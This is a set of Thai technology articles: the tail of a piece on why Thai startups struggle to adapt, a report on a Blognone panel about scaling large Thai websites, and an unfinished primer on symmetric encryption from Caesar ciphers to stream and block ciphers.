ส่วนคู่แข่งกลุ่มซอฟต์แวร์เฮาส์ ก็เน้นการขายโซลูชันใหญ่ๆ ในราคาแพงเพียงอย่างเดียว จึงทำให้สตาร์ตอัพมีข้อได้เปรียบเหนือคู่แข่งเยอะ แต่มาถึงยุคปัจจุบัน เราเห็นการปรับตัวของธุรกิจยักษ์ใหญ่ในไทย ที่หันมาทำโครงการนวัตกรรมต่างๆ กันถ้วนหน้า ในแง่กระบวนการภายในก็ทำงานกันเร็วขึ้น มีการตั้งบริษัทลูกขึ้นมาดูแลโครงการใหม่ๆ เพื่อลดความเสี่ยง ในอีกด้าน ซอฟต์แวร์เฮาส์แบบเดิมก็ปรับตัวเช่นกัน ปรับแพ็กเกจราคาให้ถูกลง ปรับโมเดลธุรกิจมาเป็นแบบ subscription แทนการขายขาด แต่สตาร์ตอัพกลับเป็นกลุ่มที่ยังทำตัวแบบเดิม กล่าวคือยังยึดติดกับวิธีการตั้งแต่สมัยเมื่อ 4-5 ปี ในขณะที่คู่แข่งปรับตัวมาเท่าทันหมดแล้ว ถ้าใครยังทำสตาร์ตอัพแนว B2C ตอนนี้คงอยู่ยากพอสมควร เพราะคู่แข่งเยอะมาก ไม่ว่าจากสตาร์ตอัพด้วยกันเอง Corporate ที่ลงมาทำเองหรือเอาของสตาร์ตอัพมาเป็น Partner ด้วย และรวมถึงมีผู้เล่นยักษ์ใหญ่จากต่างชาติอีก ตามรายงานในตลาดโลกก็สะท้อนภาพชัดเจนว่า สตาร์ตอัพB2B เติบโตได้ดีกว่า B2C มาก แต่เมืองไทยยังคิดแบบ B2C กันอยู่เยอะ เพราะมันเริ่มง่ายกว่า แต่เอาเข้าจริงๆก็หาสตาร์ตอัพไทยหน้าใหม่ๆที่ทำ B2Cแล้วประสบความสำเร็จนั้นมีน้อยมาก มายาคติอีกอย่างของสตาร์ตอัพไทยสาย data ที่หวังว่าถ้ามีผู้ใช้งานฟรีจำนวนมากๆ แล้วจะหารายได้จากการขายข้อมูลแทน สิ่งที่เกิดขึ้นจริงคือ รายได้ต่อหัวลูกค้าที่ได้จากการส่ง Lead-Gen นั้นไม่ได้สูงมาก จะหวังรายได้จากการขาย Lead-Gen อย่างเดียวคงไม่เพียงพอต่อการดำเนินงาน การหารายได้จากหลายช่องทางจีงเป็นสิ่งที่สำคัญมาก ### จุดบอดของผู้ก่อตั้งสายเทคนิค ไม่สนใจงานขาย เน้นแต่สร้างฟีเจอร์ เมื่อถามต่อว่าอะไรคือสาเหตุที่ทำให้สตาร์ตอัพไทยไม่ยอมปรับตัว คุณธนพงษ์บอกว่าสิ่งที่สอนๆ กันมาในหมู่สตาร์ตอัพไทย คือคำว่า fail fast, learn fast แต่หลายคนอาจเข้าใจคำว่า fail ไม่ถูกต้อง เพราะหลายๆครั้ง สตาร์ตอัพเองอาจจะไม่รู้ถึงสาเหตุของการล้มเหลวนั้นๆก็เป็นได้ หรืออาจเรียกได้ว่าเป็นการแก้ปัญหาผิดจุดนั่นเอง ปัจจัยสำคัญที่พบในสตาร์ตอัพไทยคือ บรรดาผู้ก่อตั้งส่วนมากมาจากสายพัฒนาซอฟต์แวร์ เป็นคนสายเทคนิค แต่ปัจจัยชี้เป็นชี้ตายของสตาร์ตอัพในสายตานักลงทุนหรือ VC คือ "เก็บเงินได้หรือเปล่า" เรามีจำนวนผู้ใช้งานเยอะจริง แต่จะเปลี่ยนพวกเขามาเป็น paid users ได้หรือไม่ พอเห็นตัวเลข (Traction) ว่ายอดคนจ่ายเงินไม่ดีหรือไม่เติบโต สิ่งแรกที่บรรดาผู้ก่อตั้งสายเทคนิคคิดคือ ตัวผลิตภัณฑ์ (product) ของเรายังไม่ดีพอ จึงแก้โดยการพัฒนาฟีเจอร์เพิ่มเข้าไปเรื่อยๆ แทนการพูดคุยกับลูกค้าเพื่อหาสาเหตุว่าทำไมจึงขายไม่ได้ ลูกค้าอาจจะไม่ได้ต้องการฟีเจอร์อะไรเพิ่ม แต่อาจจะติดปัญหาอะไรบางอย่าง การมีเซลล์ไปดูแลอาจจะทำให้ยอดตัวเลขดีขึ้นได้ เท่าที่พบมาสตาร์ตอัพส่วนใหญ่ละเลยในส่วนของการขาย (sales) นี้ไป สิ่งที่พบบ่อยคือเมื่อได้เงินจากนักลงทุน แล้วนำไปขยายทีมนักพัฒนาเพิ่ม ในขณะที่ทั้งบริษัทอาจมีเซลส์แค่คนเดียว บางบริษัทเอาคนทำงานซัพพอร์ตมาขายด้วยซ้ำ เนื่องจากพฤติกรรมของคนไทยไม่ค่อยยอมที่จะจ่ายเงินง่ายๆสักเท่าไหร่ ทำให้ในตลาดองค์กรจึงต้องมีเซลส์ไปปิดการขาย แต่กลายเป็นว่าทุกคนหันไปโฟกัสงานในส่วนของผลิตภัณฑ์ สตาร์ตอัพแบบ B2C อาจจะไม่ต้องใช้เซลส์ เพราะเน้นการยิงโฆษณาออนไลน์ และเน้นเครื่องมืออัตโนมัติที่ช่วยสร้าง conversion มากกว่า แต่พอเป็นตลาด B2B ยังไงก็ต้องมีเซลส์ไปวิ่งปิดการขาย ### องค์กรไทยปรับตัวเร็ว โอกาสของสตาร์ตอัพยิ่งยากขึ้น เนื่องจากองค์กรขนาดใหญ่ของไทยมีการปรับตัวที่ค่อนข้างเร็ว ในขณะที่ฝั่งสตาร์ตอัพปรับตัวได้ช้ากว่า รวมไปถึงการเข้ามาของสตาร์ตอัพต่างชาติมีส่วนทำให้โอกาสของสตาร์ตอัพไทยยากขึ้นไปอีก ถ้าจัดกลุ่มงานของธุรกิจใหญ่ๆ ในไทย งานที่เป็นงานหลักขององค์กร (core service) ถ้าสามารถทำเองได้ องค์กรก็จะทำเองดีกว่า (เช่น ธนาคารทำแอพบนมือถือของตัวเอง) และถ้าสตาร์ตอัพจะมาแข่งในตลาดหลักขององค์กรนี้ คงเป็นไปได้ยากในปัจจุบัน สิ่งที่สตาร์ตอัพยังพอมีช่องว่างคืองานที่เป็น non-core service หรือในตลาดที่เป็น Niche ที่ตัวองค์กรไม่อยากทำเอง หรือไม่เห็นความสำคัญมากพอ ในส่วนนี้จะสามารถนำโซลูชั่นจากสตาร์ตอัพเข้ามาช่วยได้ สตาร์ตอัพควรปรับวิธีทำงานร่วมกับองค์กรด้วย - สตาร์ตอัพควรพร้อมยอมทำ customize หรือปรับแต่งตัวเองบ้างให้เข้ากับระบบขององค์กรที่มีอยู่ หลายครั้งเจอสตาร์ตอัพที่ไม่ยอม customize เพื่อลูกค้าองค์กรเพียงแค่รายเดียว เพราะมองว่าเป็นวิธีการที่ไม่สเกล ซึ่งผิดจากตำราที่สอนกันมา - ทางองค์กรเองก็มีต้นทุนทั้งเรื่องเวลาและค่าใช้จ่ายในการทำงานกับสตาร์ตอัพเช่นเดียวกัน ถ้าเป็นไปได้องค์กรก็จะเลือกคุยกับสตาร์ตอัพที่โตดีแล้วเป็นหลัก สตาร์ตอัพไทยส่วนใหญ่ยังมีขนาดไม่ใหญ่พอ พอมีขนาดเล็กเกินไป ทำให้องค์กรหันไปดีลกับสตาร์ตอัพต่างชาติเจ้าใหญ่ๆ มากกว่า ตอนนี้การหาช่องว่างตลาดที่เป็น blue ocean ไม่มีเจ้าของ ที่จะเข้าไปกินตลาดแบบง่ายๆอาจทำไม่ได้อีกแล้ว เนื่องจากทุกตลาดล้วนแต่มีคู่แข่ง ทางรอดคือการต้องปรับตัว ต้องทำงานหนักขึ้น ต้องไปสร้างตลาดใหม่ๆขึ้นเอง เช่น การทำพวก Deep Tech หรือปรับตัวเข้าไปช่วยตอบโจทย์ non-core ขององค์กรเพื่อให้อยู่รอดได้ ### วิเคราะห์สถานการณ์สตาร์ตอัพไทยปี 2020 คุณธนพงษ์ ประเมินสถานการณ์ของสตาร์ตอัพไทยในปี 2020 ว่าต้องมองทั้งระบบ มองเป็น ecosystem จะเห็นภาพเป็นพีระมิด เป็น funnel เริ่มจากฐานคือ **สตาร์ตอัพหน้าใหม่** ที่เป็นขาเข้าของ funnel ต้องเน้นจำนวนเพื่อให้ ecosystem เติบโต สตาร์ตอัพกลุ่มนี้จำเป็นต้องมี incubator หรือ accelerator เข้ามาช่วยลงทุน ช่วยประคบประหงมให้บริษัทเหล่านี้เติบโตและอยู่รอดได้ ปัญหาใหญ่ตอนนี้คือโครงการ corporate accelerator ของภาคเอกชนไทย เริ่มทยอยเลิกทำกันเกือบหมดแล้ว ทั้งจากฝั่งโทรคมนาคมหรือฝั่งธนาคาร เพราะมองเห็นว่าลงทุนในระดับชั้นนี้แล้วหวังผลยาก ข้อเสียของการเลิกทำคือ สตาร์ตอัพหน้าใหม่ๆ ไม่มีเวทีให้เล่น ไม่มีเวทีให้แสดงความสามารถ เพราะส่วนมากบริษัท VC จะมารับช่วงลงทุนต่อจาก accelerator ที่ขั้นนี้ ส่วนโครงการ accelerator ของภาครัฐ จะเน้นในรูปแบบของการลงทุนเป็นเงินให้เปล่า (grant) โดยไม่ได้มีการลงไปควบคุมหรือดูแลมากนัก ทำให้สตาร์ตอัพขาดคำแนะนำในด้านอื่นๆที่นอกเหนือจากการได้รับเงินทุน อย่างในต่างประเทศมีแนวคิดที่เรียกว่า matching fund คือการที่รัฐบาลลงสมทบกับ VC เอกชน เพื่อให้ VC เอกชนเข้าไปช่วยดูแล ถัดมาคือ **กลุ่มสตาร์ตอัพที่เริ่มโตแล้ว** อยู่ตรงกลางของ funnel กลุ่มนี้ยังมีเงินทุนรอลงทุนในรอบ Series A/B อยู่เยอะ ไม่ต้องเป็นห่วงเรื่องเงินทุนมาก แต่การระดมทุนคงไม่ง่ายเหมือนเดิม หลังจากที่ลองผิดลองถูกในการเลือกลงทุนมาซักพัก ตอนนี้ VC ก็จะมีประสบการณ์มากขึ้น ตั้ง target ได้ชัดเจนขึ้น ในกลุ่มนี้ VC ส่วนใหญ่จะพิจารณาเรื่องการสามารถสร้างรายได้และกำไรเพิ่มขึ้นมา ซึ่งจากต่างจากสมัยก่อนที่จะเน้นมากที่จำนวนยอดผู้ใช้งาน อย่างของ Beacon VC เราจะเน้นเพิ่มในเรื่องว่าจะต้องสร้าง synergy เป็นหลัก ตัวอย่างเช่น ถ้าเป็น B2C Platform ก็ต้องมีฐานลูกค้าระดับไหน ถึงจะลง ถ้าเป็น B2B ก็ต้องไป complement กับแบงค์ หรือช่วยลูกค้าแบงค์ได้ กลุ่มสุดท้ายคือ**สตาร์ตอัพที่โตมากๆ แล้ว** ใกล้ได้เวลา exit ซึ่งเป็นเรื่องสำคัญมาก เพราะต้องแสดงให้กลุ่มนักลงทุนชั้นต้น (angel investor) เห็นชัดๆ ว่าลงเงินแล้วสามารถมีบริษัท exit ได้จริงๆ ไม่อย่างนั้นจะเป็นผลเสียกับทั้งอุตสาหกรรม เพราะถ้า angel เห็นว่าลงไปไม่ได้อะไรกลับคืนมา ก็จะเลิกลงทุนในสตาร์ตอัพรุ่นหลัง ทางแก้ก็ต้องมีภาครัฐ ที่ต้องช่วยให้ exit ได้ เช่น แนวคิดการเปิดกระดานใหม่ของตลาดหลักทรัพย์ (กระดานที่สามนอกเหนือจาก SET และ mai) ซึ่งน่าจะมีการลดเกณฑ์ลงจาก ก.ล.ต. ที่เพิ่งมีข่าวออกมา งานยากที่สุดอันหนึ่งของซีอีโอคือ หากธุรกิจเริ่มโตไปต่อไม่ได้ คุณจะมีท่าอย่างไร ทางออกหนึ่งที่ทำกันในต่างประเทศคือการควบธุรกิจรวมกับคู่แข่ง (merge) ซึ่งยังไม่ค่อยเห็นในประเทศไทยสักเท่าไรนัก ส่วนใหญ่ยังหวงธุรกิจเดิมกันอยู่ บางรายมองว่าสามารถไปต่อเองเพียงลำพังได้ หรือถ้าอดทนสู้ต่อไปอีกนิด คู่แข่งอาจจะล้มตายกันไปเอง ซึ่งกลับกลายเป็นว่าคู่แข่งเราไปควบรวมกับบริษัทใหญ่ๆ แทน แล้วอาจใหญ่กว่าเราอีกก็ได้ ตรงนี้ต้องเปิดใจให้กว้างมากขึ้น เพราะเมืองนอกการควบรวมเป็นเรื่องปกติ เมื่อโตเองลำพังแล้วโอกาสเข้าตลาดมีน้อยลง
# Blognone Quest for High Scalabilty Computing: เสวนาคนไทยทำเว็บขนาดใหญ่กันอย่างไร เมื่อช่วงต้นเดือนที่ผ่านมา Blognone มีงานเสวนาที่ไม่ได้ประกาศภายนอก โดยเชิญผู้ร่วมงานเป็นกลุ่มตัวแทนของผู้ดูแลเว็บขนาดใหญ่จำนวนหนึ่ง เช่น [Sanook.com](http://sanook.com/), Kapook, MThai, ไทยรัฐ, Thaitrend, [Tarad.com](http://tarad.com/), และ [Pantip.com](http://pantip.com/) ทั้งหมดได้ร่วมพูดคุยกันถึงประสบการณ์ปัญหาต่างๆ ที่เคยเจอมาว่าในการทำเว็บที่ใหญ่ขึ้นเรื่อยๆ เคยเจอปัญหากันอย่างไร และมีประสบการณ์การแก้ไขกันอย่างไรมาแล้วบ้าง คนแรกคือคุณเชิดศักดิ์ โชครวมชัย รองประธานอาวุโสฝ่ายปฏิบัติการเครือข่ายจากเว็บสนุก ได้เล่าถึงกระบวนการการปรับตัวของเว็บในแต่ละระดับเป็น 7 ระดับ นับแต่การทำเว็บแบบเน้นฟีเจอร์อย่างเดียว ไล่ไปจนถึงระดับที่อาจจะไม่มีใครที่เรารู้จักเคยเจอโหลดในระดับเดียวกันมาก่อน ประสบการณ์เหล่านี้จะแสดงให้เห็นว่าเมื่อเราสามารถผ่านระดับที่ความยุ่งยากต่างๆ ไปได้ เราจบพบในช่วงที่ระบบสามารถขยายออกไปได้อย่างมีประสิทธิภาพ แต่ในสุดท้ายแล้วหากเว็บยังคงเติบโตด้วยความเร็วสูง เราจะพบปัญหาที่ต้องสร้างความรู้ด้วยตัวเอง ปัญหาใหม่ๆ เช่น พลังงาน, ผู้ใช้จากหลายประเทศทำให้ต้องใช้งาน CDN, ไปจนถึงกระบวนการจัดการกระบวนการทำงานและการจัดการคน คุณโดม เจริญยศ เล่าถึงกระบวนการดูแลเว็บ Kapook และ TVPool โดยเล่าถึงประสบการณ์การเลือกเทคโนโลยี เช่น การเลือกของ Rackspace โดยปัจจัยสำคัญของการเลือกเทคโนโลยี คือ "เอาอยู่" เขาเล่าถึงการใช้ PHP ที่ใช้งานได้ดีแม้อาจจะต้องใช้หน่วยความจำสูงสักหน่อย และการเลือกการทำเครื่องเสมือนด้วย OpenVZ แต่ยังหาแนวทางใหม่ๆ เช่น Lua บน Nginx และกำลังหันไปใช้ docker มาแทนเครื่องเสมือนแล้วรันผ่านพอร์ตอย่างเดียว ทางฝั่ง MThai เข้ามาเล่าถึงการพัฒนาแอพพลิเคชั่นที่โหลดหนักที่สุดนั่น คือ "lotto" (ตรวจหวยออนไลน์) ทาง MThai ใช้ Wordpress และเคยใช้ TotalCache มาก่อน แต่สุดท้ายต้องพัฒนาปลั๊กอินของตัวเองเพื่อให้ความต้องการ สร้างไฟล์ static ขึ้นมา และเมื่อมีการอัพเดตก็ปรับไฟล์ static ใหม่อีกครั้ง เป็นแนวทางที่ MThai เลือกต่างออกไปจากผู้ให้บริการรายอื่นๆ ที่พัฒนาแอพพลิเคชั่นเองทั้งหมด เว็บไซต์ไทยรัฐออนไลน์ โดยคุณ สิริชัย มีมุทา ผู้จัดการฝ่ายวิจัยและพัฒนาได้มาเล่าถึงปัญหาแอพพลิเคชั่นที่พบมา ปัญหาหลักคือฐานข้อมูล ทางไทยรัฐจึงพยายามให้โค้ดต้องยุ่งกับฐานข้อมูลน้อยที่สุด เพราะปัญหาหลายครั้งก็ไม่ใช่ปัญหาจากโหลดภายนอกแต่เป็นโปรแกรมเองที่ไม่ได้ทดสอบบนโหลดที่หนัก บริการถัดไปเป็นบริการที่เราอาจจะไม่ได้ใช้ "เว็บ" โดยตรง เพราะเป็นระบบ Thaitrend โดยคุณคเชนท์ หวังธรรมมั่ง ที่เก็บทวีตของคนไทยจำนวนมากในแต่ละวันตั้งแต่ปี 2010 เป็นต้นมา โหลดของ Thaitrend นั้นต่างจากโหลดของเว็บอื่นๆ เพราะเป็นโหลด "เขียน" ช่วงที่โหลดหนักที่สุดคือ 20000 ทวีตต่อนาที รวมสี่ล้านทวีตต่อวันโดยประมาณ ข้่อมูลรวมประมาณ 1 GB ต่อวัน จากผู้ใช้รวมประมาณสองล้านคน ทำให้ต้องปรับกระบวนการประมวลผลเป็นรูปแบบ asynchronous โดยต้องเก็บข้อมูลหลายชั้น เช่น การเก็บข้อมูลเข้าสู่ Redis ก่อนที่จะเขียนลง MySQL โดยตอนนี้กำลังทำระบบวิเคราะห์ทวีตหกเดือนย้อนหลังผ่านระบบ Elasticsearch ที่ต้องการประมวลผล โดย Elasticsearch มีข้อดีสำคัญคือระบบการสเกลเช่น sharding หรือ cluster ล้วนทำโดยอัตโนมัติทั้งสิ้น คุณคเชนท์ยังเล่าถึงประสบการณ์การดูแลเว็บ [Tarad.com](http://tarad.com/) ที่เคยเจอ spike ถึง 30 เท่าของโหลดปกติ ระบบ shopping cart และระบบจัดการสมาชิกล่ม กระบวนการแบบนี้ยังคงเกิดขึ้นเรื่อยๆ เมื่อมีรายการโปรโมชั่นใหม่ๆ และการออกโทรทัศน์ทำให้เว็บโหลดหนัก การใช้แคชในการกระบวนการเหล่านี้ไม่สามารถทำได้เพราะเป็นระบบที่คิดเงิน ทำให้วางแผนกันปรับไปใช้ระบบไฟล์ GlusterFS เพื่อเก็บฐานข้อมูล MariaDB กันต่อไป คุณสมศักดิ์ ศรีประยูรสกุล จากบริษัท INOX ที่ช่วย [Pantip.com](http://pantip.com/) ดูแลระบบ โดยประสบการณ์ของเขาคือปัญหาการสเกลนั้นมักจะเป็นปัญหาที่ผสมกัน เช่น Pantip เคยเจอปัญหาแบนด์วิดท์เต็มก่อนจึงไปพบปัญหา มาจนถึงปัญหาการกระจายโหลดที่ไม่สมดุลระหว่างกัน ทำให้การกระจายโหลดไม่ทั่วถึง คุณ FordAntitrust พูดถึงการดูแลเครื่องในบริการ subscription ที่ใหญ่น่าจะที่สุดในประเทศไทย (เปิดเผยชื่อไม่ได้) ความพิเศษของประสบการณ์นี้คือบริการทั้งหมดอยู่บนกลุ่มเมฆทั้งหมด และโหลดหนักมากจนกระทั่งต้องขอเพิ่มเครื่องเป็นกรณีพิเศษ ประสบการณ์การใช้บริการกลุ่มเมฆทำให้ latency ของระบบมีค่อนข้างสูงทำให้เธรดต้องรอการเชื่อมต่อนานกว่าปกติ การใช้บริการบนกลุ่มเมฆยังมีข้อจำกัดเช่น การดูแลระบบของผู้ให้บริการ ไปจนถึงสเปคเครื่องที่ไม่สามารถกำหนดได้ตามความต้องการ และการควบคุมเครือข่ายไม่ได้ ทำให้แต่ละเครื่องอาจจะเชื่อมต่อกันไม่ได้ตามต้องการ เครื่องที่สร้างขึ้นมาใหม่อาจจะมี latency ระหว่างเครื่องอาจจะสูงเกินไป อย่างไรก็ดีบริการบนกลุ่มเมฆยังมีความได้เปรียบสำคัญคือการปรับขนาดระบบได้อย่างยืดหยุ่น โหลดที่คาดเดาไม่ได้นั้นแทบจะเป็นไปไม่ได้เลยที่จะซื้อเครื่องเซิร์ฟเวอร์ตามสเปคที่ต้องการมาเตรียมไว้ล่วงหน้า บริการกลุ่มเมฆเปิดให้ผู้ให้บริการสามารถขยายบริการไปบนเครื่องที่อาจจะมีข้อจำกัดบ้าง แต่ยังขยายต่อออกไปได้ ในงานยังมีการนำเสนอจากคุณ javaboom พูดถึงการพัฒนาประมาณการความต้องการของโครงสร้างพื้นฐานว่าเราจะประมาณการกันอย่างไร และคุณกิตติพงษ์ พูดถึงระบบการยุบรวมชั้นต่างๆ ของบริการเว็บเข้าเป็นแพลตฟอร์มที่บางลง และปรับกระบวนการพัฒนาไปเป็นภาษาเนทีฟ โดยใช้ภาษา vala และภาษา C เพื่อให้ระบบรวมเร่งความเร็วขึ้นไปได้นับสิบเท่าจากระบบปกติที่เราใช้กันทั่วไป Blognone Quest มีความตั้งใจที่จะเป็นชุดของงานที่หยิบยกประเด็นต่างๆ ในโลกไอที เพื่อหาผู้ที่มีประสบการณ์ร่วมกันเข้ามาแลกเปลี่ยนกัน งาน High Scalability เป็นงานครั้งแรกที่เราจัดขึ้น ในอนาคตเราจะหาหัวข้อและผู้ร่วมแลกเปลี่ยนที่กันในอนาคตต่อไป วิดีโอทั้งงานสามารถเข้าดูได้ที่ [YouTube: Blognone Quest - High Scalability](https://www.youtube.com/playlist?list=PLIrthe31LuUUr049bL5ySK-LiFEaRqJzA&feature=edit_ok)
# Symmetric Encryption: ถ้ารู้จัก ต้องรู้ใจ ในบรรดากระบวนการเข้ารหัสนั้น เราอาจจะบอกได้ว่าการเข้ารหัสแบบกุญแจสมมาตร (symmetric key) ที่เป็นกระบวนการการเข้ารหัสที่ทั้งสองฝ่าย มี “ความลับ” ร่วมกันอยู่ก่อน เมื่อส่งข้อมูลจริงแล้วจึงใช้ความลับนั้นถอดรหัสผ่านออกมาได้จึงได้ข้อความที่อ่านออกมาได้ กระบวนการป้องกันข้อความที่เป็นความลับนั้นมีมานานนับย้อนไปได้ถึงสมัยจูเลียส ซีซาร์ ที่อาศัยการสลับตัวอักษรด้วยตารางที่เป็นความลับ โดยทุกตัวในตารางจะมีตัวแทนของตัวเองทั้งหมด การเข้ารหัสนี้ได้ผลดีอยู่หลายร้อยปี ข้อความที่สำคัญถูกแปลงเป็นข้อความที่อ่านไม่ออก เช่นหากเราแปลงข้อความด้วยการเลื่อนตัวอักษรไปเป็น 13 ตัวข้างหน้า (มีชื่อเรียกเฉพาะว่าการเข้ารหัสแบบ rot13) ข้อความทางการทหารอย่าง “FALLING BACK PLEASE WAIT FOR ME” (กำลังล่าถอย รอด้วย) จะถูกแปลงเป็นข้อความที่อ่านไม่ออกอย่าง “SNYYVAT ONPX CYRNFR JNVG SBE ZR” ทดลองเล่นการเข้ารหัสได้ใน [forret.com](http://web.forret.com/tools/rot13.asp?rot=13&cipher=V%27Z+GELVAT+GB+GRNPU+GUR+PNIRZRA+GB+CYNL+FPENOOYR.+VG%27F+HCUVYY+JBEX.+GUR+BAYL+JBEQ+GURL+XABJ+VF+%27HAU%27%2C+NAQ+GURL+QBA%27G+XABJ+UBJ+GB+FCRYY+VG.%09&clear=falling+back+please+wait+for+me&dir=encrypt) ความแข็งแกร่งหรืออ่อนแอของกระบวนการนี้ทำให้เราสามารถสร้างตารางแทนตัวอักษรได้ทั้งหมด 26! กรณีซึ่งมากพอสำหรับยุคนั้น ในความเป็นจริงแล้วกระบวนการสร้างตารางกลับใช้วงล้อแทนตัวอักษร ที่หมุนไปมาเพื่อสร้างตารางตัวอักษรแทนกัน ทำให้ความเป็นไปได้เหลือเพียง 26 กรณีเท่านั้น เมื่อผู้ดักฟังข้อความเข้ารหัสทดสอบด้วยตารางแบบต่างๆ ทุกรูปแบบก็จะพบรูปแบบใดรูปแบบหนึ่งที่สามารถอ่านออกได้ และรู้ว่าข้อความนั้นเป็นข้อความที่ถูกต้อง แม้จะสร้างตารางที่ความเป็นไปได้มากด้วยการสร้างตารางที่ไม่ได้อาศัยการหมุนวงล้อ ความอ่อนแอของระบบการเข้ารหัสแบบนี้ก็ถูกพบในช่วงศตวรรษที่ 9 (ค.ศ. 800 ถึง ค.ศ. 900) ว่าในความเป็นจริงแล้วเราสามารถถอดรหัสรูปแบบนี้ได้หากเรารู้คุณสมบัติของ “ภาษา” ที่เราใช้เสียก่อน เช่น ภาษาอังกฤษนั้นตัว E จะเป็นตัวอักษรที่ถูกใช้งานมากเป็นอันดับแรก และตัว A เป็นอันดับที่สอง รวมถึงคุณสมบัติเช่น ตัวอักษรที่อยู่เดียวๆ นั้นมักจะเป็นตัว A ตัวอักษรที่แยกเป็น 3 ตัวมักเป็นคำว่า THE กระบวนการเช่นนี้ทำให้หากข้อความยาวเพียงพอ หรือมีการส่งข้อความด้วยตารางรหัสเดิมมากพอ ผู้ดักฟังก็จะถอดรหัสได้อย่างรวดเร็ว ### One Time Pad กระบวนการสร้างตารางเปลี่ยนรหัสผ่าน ถูกแปลงมาอีกครั้งด้วยคำถามใหม่ว่า จะเป็นอย่างไรถ้าเรามีตารางสำหรับ “ทุกตัวอักษร” ในข้อความนั้นๆ ตัวอย่างนี้แสดงถึงตารางสำหรับทุกตัวอักษรในข้อความที่เราจะส่ง หากเรามีตารางนี้ระหว่างเรากับปลายทางอยู่ล่วงหน้า การเข้ารหัสก็จะสมบูรณ์ ไม่สามารถแกะข้อความเดิมออกมาได้ การเข้ารหัสแบบนี้ แม้ผู้ที่ดักฟังข้อมูลระหว่างทางได้จะสามารถหาตารางอื่นๆ ที่ดูจะให้ข้อความที่ “อ่านได้” แต่ไม่สามารถแน่ใจได้เลยว่าเป็นข้อความจริงหรือไม่ รูปแบบหนึ่งที่ใช้งานจริงในระบบการเข้ารหัสแบบนี้คือการใช้ตัวเลขไบนารีแบบสุ่มความยาวเท่าๆ กับข้อมูลที่เราต้องการเข้ารหัสมาเป็นความลับระหว่างผู้ส่งและผู้รับปลายทาง เมื่อแชร์ข้อมูลระหว่างกัน เช่นคำว่า “FALLBACK” นั้นในข้อมูลไบนารีจะเป็นข้อมูลไบนารี ข้อมูลที่เป็นเลขไบนารีสุ่มนี้ทำให้เราเรียกการเข้ารหัสแบบนี้ว่า One Time Pad คือเมื่อเรามีตัวเลขสุ่มที่แชร์ระหว่างต้นทางและปลายทาง คนที่มองเห็นข้อมูลที่เข้ารหัสแล้วจะไม่มีทางถอดรหัสโดยแน่ใจว่าข้อมูลนั้นถูกต้องได้เลย กระบวนการรักษาความปลอดภัยข้อมูลเช่นนี้จึงเป็นตัวอย่างหนึ่งของการรักษาความปลอดภัยที่ปลอดภัยโดยไร้เงื่อนไข (unconditionally secure) แต่ข้อจำกัดของ One Time Pad คือมันจะปลอดภัยก็ต่อเมื่อมีการใช้งานเพียงครั้งเดียวเท่านั้น เพราะการใช้งานซ้ำ ในแต่ละตัวอักษรจะรู้ได้ทันทีว่าเป็นข้อมูลเดิมหรือไม่ หากมีการใช้งาน One Time Pad กับข้อมูลที่ต่างกันบ่อยครั้งมากๆ สุดท้ายคนที่ดักฟังได้ก็จะสามารถรู้ได้ว่าข้อมูลที่ส่ง และกุญแจที่ส่งนั้นคืออะไร ### Stream Cipher ในโลกความเป็นจริง การเข้ารหัสแบบ One Time Pad นั้นนับว่าเป็นกระบวนการที่ลำบาก โดยเฉพาะในแง่ของความเร็ว ที่ข้อมูลสำหรับการเข้ารหัสจะมีขนาดใหญ่เท่าๆ กับตัวข้อมูลเอง ในแง่ของการลดภาระในการส่งกุญแจที่ต้องมีขนาดเท่ากับตัวข้อมูล จึงมีการสร้างระบบเข้ารหัสที่เรียกว่า stream cipher ขึ้นมา stream cipher โดยหลักการแล้วมันคือการใช้ค่าจากฟังก์ชั่น pseudo random number generator (PRNG) เพื่อสร้างข้อมูลไบนารีขนาดยาวขึ้นมา โดยค่าเริ่มต้นของ PRNG นั้นเป็นค่าความลับที่ผู้รับและผู้ส่งแชร์ระหว่างกัน ข้อมูลนั้นมักมีขนาดเล็ก แต่สามารถสร้างไบนารีแบบสุ่มที่มีขนาดใหญ่ขึ้นมาเพื่อ XOR กับข้อมูลทั้งหมดที่ต้องการเข้ารหัสได้ ตัวอย่างการใช้งานในรูปแบบนี้ได้แก่การเข้ารหัสแบบ A5/1 ในโทรศัพท์ GSM ที่ใช้ฟังก์ชั่นในตระกูล LFSR ที่เป็นฟังก์ชั่น PRNG ตัวหนึ่ง หรือใน WEP ของระบบแลนไร้สายที่ใช้ฟังก์ชั่น RC4 เป็นตัวสร้างไบนารีเช่นกัน การเข้ารหัสแบบ SSL RC4_128 เป็นการเข้ารหัสแบบแบบ stream cipher ที่เว็บขนาดใหญ่ล้วนใช้งานจากความได้เปรียบด้านความเร็ว และการส่งข้อมูลที่เป็นชุดที่วิ่งอยู่บนโปรโตคอล TCP ที่ช่วยลดปัญหาข้อมูลสูญหายระหว่างทางไปแล้ว ### Block Cipher การทำ stream cipher แม้จะแก้ปัญหากุญแจเข้ารหัสมีขนาดใหญ่ไปได้ แต่การที่กุญแจเข้ารหัส ซึ่งกลายเป็นค่าเริ่มต้นสำหรับ PRNG นั้นมีขนาดเล็ก ทำให้ความปลอดภัยโดยรวมนั้นลดลงอย่างหลีกเลี่ยงไม่ได้ เช่นหากค่าเริ่มต้นของฟังก์ชั่น PRNG ความเป็นไปได้เพียง 2^32 ค่า (ขนาดกุญแจมีขนาด 32 บิต) ผู้ดักฟังข้อมูลไปได้ ก็อาจจะไล่ค่าที่เป็นไปได้เรื่อยๆ แล้วดูว่าค่าใดที่ให้ข้อมูลไบนารีแบบสุ่มแล้วนำไป XOR กับข้อมูลเข้ารหัสแล้วได้ค่าที่มีความหมายแสดงว่าได้เจอกุญแจที่ถูกต้องแล้ว แม้การขยายขนาดกุญแจไปเรื่อยๆ ในทุกวันนี้หากข้อมูลที่ส่งไประหว่างทางมีการตรวจสอบความถูกต้อง กุญที่ถอดรหัสแล้วสามารถตรวจสอบความถูกต้องได้ก็มีความเป็นไปได้สูงว่าจะมีเพียงกุญแจเดียว จากกุญแจที่เป็นไปได้จำนวนมหาศาล กระบวนการเช่นนี้ทำให้ความปลอดภัยโดยรวมของ stream cipher นั้นต่ำกว่า one time pad อยู่ ในโลกความเป็นจริง การเข้ารหัสแม้จะเป็น stream cipher มักจะใช้กุญแจขนาดใหญ่กว่า 128 บิตขึ้นไปเพื่อรับประกันได้ว่าจะไม่มีใครสามารถไล่กุญแจทุกกุญแจที่เป็นไปได้ภายในช่วงเวลาหลายสิบปีข้างหน้า stream cipher สามารถใช้เข้ารหัสข้อมูลขนาดใหญ่ได้ แต่การใช้งานทุกวันนี้ 